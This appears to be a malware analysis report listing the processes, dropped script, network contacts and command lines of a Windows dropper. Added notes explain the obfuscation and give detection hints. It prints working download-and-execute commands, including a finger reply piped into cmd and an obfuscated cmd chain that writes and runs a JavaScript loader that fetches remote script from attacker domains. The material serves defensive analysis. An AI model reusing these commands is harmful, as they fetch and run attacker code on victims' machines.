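Technical Information
The entries below are, in order: processes launched, a file path under %LOCALAPPDATA%, network endpoints (host:port), DNS queries, and full command lines. Hostnames in the network and DNS entries are partly masked with '#'; the two non-generic ones appear unmasked in the command lines (hniier.mercaneteucatex.email and q4ionh.hdcxsfnyutvi.date).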
- '<SYSTEM32>\finger.exe' ok@hniier.mercaneteucatex.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\3Lf.js"
- %LOCALAPPDATA%\3lf.js
- 'hn####.##rcaneteucatex.email':79
- 'q4####.#dcxsfnyutvi.date':80
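- 'cl###flare.com':443
- 'microsoft.com':80
  (Note: microsoft.com and, apparently, the masked cl###flare.com entry are widely used legitimate services, and the report does not say why they were contacted. On their own they are weak indicators and should not be blocklisted as if they were attacker infrastructure.)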
- 'hn####.##rcaneteucatex.email':79
- 'cl###flare.com':443
- DNS ASK hn####.##rcaneteucatex.email
- DNS ASK q4####.#dcxsfnyutvi.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
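- '<SYSTEM32>\cmd.exe' /c finger ok@hniier.mercaneteucatex.email |more +2 |cmd
  (Note: the reply from the remote finger service, TCP port 79 in the network entries above, is piped through "more +2", which drops the leading lines of the reply, and then into cmd, so the text returned by the server is run as commands. For detection, finger.exe started by cmd.exe, outbound TCP 79 from a workstation, and a cmd.exe that takes its commands from a pipe are each uncommon in normal use.)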
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt WOPU=.j&&SEt DLHVV=vDoSDarDoSD a =DoSD 'scDoSDriDoSDptDoSD:'; b =DoSD 'hDoSDTtPDoSD:'; GDoSDetDoSDObjDoSDecDoSDt(DoSDa+b+'&&sET TPMC=UTBLCUTBLCq4ionh.hdcxsfnyutvi.dateUTBLC?1UTBLC')...
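- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 6J8Y0="%DLHVV:DoSD=%%TPMC:UTBLC=/%" 0<nul 1>%LOCALAPPDATA%\3Lf%WOPU%s"
  (Note: this step undoes the padding used in the previous command. "%DLHVV:DoSD=%" removes every "DoSD" token, "%TPMC:UTBLC=/%" turns every "UTBLC" into "/", and "set /p" with input from nul and output redirected writes the resulting text to %LOCALAPPDATA%\3Lf.js, since WOPU is ".j". The visible part of that text is a script fragment that passes a "script:" + "hTtP:" address on q4ionh.hdcxsfnyutvi.date to GetObject; the report truncates the rest with "...". This matches the port 80 connection and the wscript.exe launch listed above.)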
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\3Lf%WOPU%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\3Lf.js